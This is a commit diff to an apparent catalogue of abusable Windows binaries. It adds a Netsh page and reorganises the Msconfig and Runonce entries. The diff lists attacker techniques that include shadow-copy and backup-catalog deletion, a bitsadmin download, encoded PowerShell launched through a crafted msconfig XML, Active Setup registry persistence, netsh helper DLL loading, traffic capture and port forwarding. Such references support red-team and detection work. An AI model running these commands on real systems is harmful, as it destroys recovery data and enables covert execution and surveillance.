Adjustments

Backlog.txt

@@ -6,7 +6,6 @@ Robocopy.exe	Needs examples
 Bitsadmin.exe	bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
 Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
 notepad.exe		Gui - Download files using Open (A lot of other programs as well)
-netsh.exe		Netsh helper dll file loading
 wbadmin.exe 	wbadmin delete catalog -quiet
 psexec.exe		Remote execution of code
 java.exe		-agentpath:<dllname_with_dll_extension>  or   -agentlib:<dllname>

OSBinaries/Msconfig.md

@@ -1,16 +1,5 @@
 ## Msconfig.exe
 
-* Prerequisites
-
-add a crafted .xml in System32
-```
-<?xml version="1.0" ?> 
-<MSCONFIGTOOLS> 
-<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" 
-DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/> 
-</MSCONFIGTOOLS>
-```
-
 * Functions: Execute
 
 ```
@@ -31,7 +20,14 @@ c:\windows\system32\msconfig.exe
 ```
 
 Notes:
+* Prerequisites
+add a crafted .xml in System32
 
-
-
+```
+<?xml version="1.0" ?> 
+<MSCONFIGTOOLS> 
+<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" 
+DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/> 
+</MSCONFIGTOOLS>
+```
  

OSBinaries/Netsh.md

@@ -0,0 +1,38 @@
+## Netsh.exe
+
+* Functions: Execute, Surveillance
+
+```
+netsh trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl    
+netsh trace show status    
+    
+netsh.exe add helper C:\Path\file.dll	
+     
+netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
+```
+
+Acknowledgements:
+* 
+
+Code sample:
+* 
+
+Resources:
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
+* https://attack.mitre.org/wiki/Technique/T1128
+* https://twitter.com/teemuluotio/status/990532938952527873
+
+Full path:
+```
+c:\windows\system32\netsh.exe
+c:\windows\sysWOW64\netsh.exe
+```
+
+Notes:
+
+
+
+Detection:
+
+
+ 

OSBinaries/Runonce.md

@@ -1,16 +1,9 @@
 ## Runonce.exe
 
-* Prerequisites
-
-1) Create HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\[YOURKEY]
-2) Create two Strings : 
-a) @ : Hi from Active Setup
-b) StubPath : calc.exe
-
 * Functions: Execute
 
 ```
-Runonce.exe /AlternateShellStartup 
+Runonce.exe /AlternateShellStartup   
  
 ```
 
@@ -24,10 +17,16 @@ Resources:
 Full path:
 ```
 c:\windows\system32\runonce.exe
+c:\windows\sysWOW64\runonce.exe
 ```
 
 Notes:
+* Prerequisites
 
+1) Create HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\[YOURKEY]
+2) Create two Strings : 
+a) @ : Hi from Active Setup
+b) StubPath : calc.exe